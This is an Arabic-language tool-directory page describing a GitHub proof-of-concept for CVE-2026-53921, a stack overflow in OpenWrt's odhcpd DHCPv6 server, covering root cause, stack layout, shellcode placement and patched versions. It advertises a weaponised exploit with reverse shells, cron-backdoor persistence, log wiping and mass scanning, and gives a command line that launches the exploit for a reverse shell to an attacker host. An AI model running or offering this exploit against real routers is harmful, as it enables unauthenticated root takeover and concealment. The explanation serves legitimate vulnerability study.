Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-53921-PoC-Exploit — CVE-2026-53921 – odhcpd Stack Overflow (CVSS 9.8) 🛡️ شرح تفصيلي وشامل للثغرة مع مُتحقِّق واستغلال متعدد لثغرة RCE في DHCPv6 الخاص بـ OpenWrt. تجاوز ثنائي المتجهات (IA_NA/IA_PD) مع شيلكود MIPS/ARM وسلاسل ROP ووكيل SOCKS5 واستمرارية ومسح السجلات ومسح واسع النطاق. استخدمه بأخلاقية، والتزم بالقانون. 🔒 | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-53921-poc-exploit
أمان الأنظمة المدمجةالاستطلاعأطر الاستغلالأمان إنترنت الأشياءتحليل الثغرات الأمنيةالاستغلالما بعد الاستغلالالفريق الأحمرتوليد شيفرة القشرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

CVE-2026-53921 – odhcpd Stack Overflow (CVSS 9.8) 🛡️ شرح تفصيلي وشامل للثغرة مع مُتحقِّق واستغلال متعدد لثغرة RCE في DHCPv6 الخاص بـ OpenWrt. تجاوز ثنائي المتجهات (IA_NA/IA_PD) مع شيلكود MIPS/ARM وسلاسل ROP ووكيل SOCKS5 واستمرارية ومسح السجلات ومسح واسع النطاق. استخدمه بأخلاقية، والتزم بالقانون. 🔒

تطوير الحمولات
استغلال الملفات الثنائية
GitHubtc4dy/cve-2026-53921-poc-exploit

CVE-2026-53921-PoC-Exploit

عرض المستودع
6122منذ 2 أشهرلم تتم المراجعة بعد
مشاركة

CVE-2026-53921

CVE-2026-53921 – تجاوز سعة المكدس في odhcpd

CVE CVSS OpenWrt

⚠️ لأغراض تعليمية والاختبار المصرح به فقط. الاستخدام غير المصرح به غير قانوني.


📖 نظرة عامة على الثغرة

CVE-2026-53921 هي ثغرة تجاوز سعة المخزن المؤقت للمكدس حرجة في خدمة odhcpd الخاصة بـ OpenWrt – خادم DHCPv6/DHCPv4/RA الافتراضي.

🔍 كيف تعمل

توجد الثغرة في كود معالجة رسائل DHCPv6 في odhcpd، وتحديداً في الدالتين build_ia() و dhcpv6_ia_handle_IAs().

شرح فني متعمق

1. السبب الجذري

يحدث الخطأ أثناء التسلسل (التغليف) لحزم رد DHCPv6. عندما يستجيب odhcpd لطلبات العملاء، يقوم ببناء الرد في مخزن مؤقت للمكدس بحجم ثابت يبلغ 512 بايت دون فحص مناسب لحدود الذاكرة.

// Simplified representation of the vulnerable code

static void build_ia(struct dhcpv6_ia *ia, uint8_t *buf, size_t *len) {
    // ❌ No bounds check before writing
    memcpy(buf + *len, ia->data, ia->length);
    *len += ia->length;
}

2. إحداث تجاوز سعة المكدس

يرسل المهاجم طلب DHCPv6 (أو Solicit) يحتوي على:

  • 5 خيارات أو أكثر من IA_NA (Identity Association for Non-temporary Address)، يحتوي كل منها على خيار فرعي IAAddress.
  • 22 خيارًا أو أكثر من IA_PD (Identity Association for Prefix Delegation).

يستهلك كل خيار مساحة من المكدس أثناء قيام odhcpd ببناء رده. تتجاوز البيانات المتراكمة 512 بايت، مما يسبب التجاوز.

3. متجهان للتجاوز


المتجه المشغّل نقطة التجاوز


الموقع 1 5 خيارات IA_NA build_ia() لـ IA_NA مع عناوين IPv6

الموقع 2 22 خيار IA_PD build_ia() لـ IA_PD

السبب الجذري متطابق، لكن التجاوز يحدث في مسارات كود مختلفة، مما يجعل كلا المتجهين قابلين للاستغلال بالتساوي.

4. تخطيط الذاكرة

Stack Layout (simplified):

+-------------------+  <-- High addresses
|    Return Address |  ← Overwritten with attacker-controlled value
+-------------------+
|  Saved Frame Ptr  |
+-------------------+
|  Local Variables  |  ← 512-byte buffer
+-------------------+  <-- Low addresses

يستبدل المهاجم عنوان الإرجاع المحفوظ ليشير إلى كود الشيل الخاص به في الذاكرة.

5. متطلبات الاستغلال


المتطلب الوصف


الوصول إلى الشبكة يجب أن يكون لدى المهاجم اتصال IPv6 بالهدف

المصادقة لا شيء -- هجوم دون مصادقة

الصلاحيات يعمل odhcpd بصلاحيات الجذر (root)، لذا فإن RCE تمنح تحكمًا كاملاً في النظام

الخدمة المستهدفة يجب أن يكون منفذ UDP 547 (DHCPv6) مفتوحًا

6. وضع كود الشيل (Shellcode)

في استغلال حقيقي، يتم وضع كود الشيل الخاص بالمهاجم في حقول عناوين IPv6 الخاصة بـ IAAddress (16 بايت لكل IA_NA). تقوم الحزم المعدّة بتعبئة كود الشيل، ومنحدر NOP، وعنوان الإرجاع في هذه الحقول.

Crafted IA_NA Structure:

+-------------------+
| IA_NA Header      | (12 bytes)
+-------------------+
| IAAddress 1       | ← NOP sled + shellcode
+-------------------+
| IAAddress 2       | ← NOP sled + shellcode
+-------------------+
| IAAddress 3       | ← NOP sled + shellcode
+-------------------+
| IAAddress 4       | ← Return address
+-------------------+
| IAAddress 5       | ← Return address
+-------------------+

7. سلسلة التأثير

Crafted DHCPv6 Request
         ↓
odhcpd processes IA_NA/IA_PD options
         ↓
512-byte stack buffer overflows
         ↓
Return address overwritten
         ↓
CPU jumps to shellcode
         ↓
Reverse shell / Bind shell / RCE
         ↓
Full system compromise (root privileges)

8. متجهات الهجوم مقابل حالة التصحيح

الإصدار الحالة هل RCE ممكن؟


odhcpd < e432dd6 قابل للاستغلال ✅ نعم OpenWrt < 24.10.8 قابل للاستغلال ✅ نعم OpenWrt < 25.12.5 قابل للاستغلال ✅ نعم OpenWrt 24.10.8+ مُصحح ❌ لا OpenWrt 25.12.5+ مُصحح ❌ لا odhcpd master + e432dd6 مُصحح ❌ لا

9. الاستغلال في العالم الحقيقي

هذه الثغرة خطيرة بشكل خاص للأسباب التالية:

  • odhcpd مفعل افتراضيًا على تثبيتات OpenWrt.
  • لا تتطلب أي مصادقة---أي جهاز على نفس قطاع IPv6 يمكنه الهجوم.
  • الخلل في مسار معالجة الطلبات.
  • نادرًا ما تتوفر حمايات Stack Canary و ASLR على أجهزة MIPS/ARM المدمجة.
  • يمكن للاستغلال تجاوز الدفاعات الشائعة في العديد من البيئات المدمجة.

🎯 الإصدارات المتأثرة

المكوّنالإصدارات القابلة للاستغلالتم الإصلاح في
odhcpd (فرع master)قبل الالتزام e432dd6e432dd6 أو أحدث
إصدارات OpenWrt< 24.10.8
< 25.12.5
24.10.8 و 25.12.5

🧰 الأدوات

يوفر هذا المستودع سكربتين مستقلين:

السكربتالغرضكود الاستغلالالأمان
verifier.pyفحص ثغرات غير تدخلي❌ لا✅ آمن
exploit.pyاستغلال كامل مُسلح✅ نعم⚠️ خطير

🔎 verifier.py – فاحص الثغرات

  • يرسل طلب Solicit قياسيًا لـ DHCPv6 للتحقق من أن الخدمة نشطة.
  • يقرأ لافتات HTTP/SSH لاكتشاف إصدار OpenWrt.
  • يقارن الإصدار مع النطاق المعروف القابل للاستغلال.
  • لا يرسل أي حمولة تجاوز أو كود شيل.

💥 exploit.py – الاستغلال الكامل

  • متجهات تجاوز مزدوجة: IA_NA (Site1) و IA_PD (Site2).
  • كشف تلقائي لبنية المعالج (MIPS / ARM).
  • كود شيل لعكس الاتصال والربط (reverse & bind) بترتيب البايتات الكبير (big‑endian) لـ MIPS.
  • دعم وكيل SOCKS5.
  • استمرارية (باب خلفي عبر cron) ومسح السجلات.
  • فحص مترابط واستغلال جماعي.
  • ترميز اختياري للحمولة (XOR).

🚀 التثبيت

git clone https://github.com/tc4dy/CVE-2026-53921-PoC-Exploit
cd CVE-2026-53921-PoC-Exploit
pip install -r requirements.txt
#Note: Both scripts need root privileges to craft raw IPv6 packets.

📝 الاستخدام

🔍 الفاحص – التحقق مما إذا كان الهدف قابلًا للاستغلال

sudo python3 verifier.py -u fe80::1%eth0 -i eth0

💥 الاستغلال – الحصول على شل عكسي (لا تستخدمه في نشاط غير قانوني، للاختبار المتقدم فقط)

sudo python3 exploit.py -u fe80::1%eth0 -i eth0 --lhost 192.168.1.100 --lport 4444

⚙️ خيارات سطر الأوامر

verifier.py

الوسيطالوصف
-u, --targetعنوان IPv6 للهدف (مطلوب)
-i, --ifaceواجهة الشبكة (الافتراضي: eth0)

exploit.py

تنزيل الأداة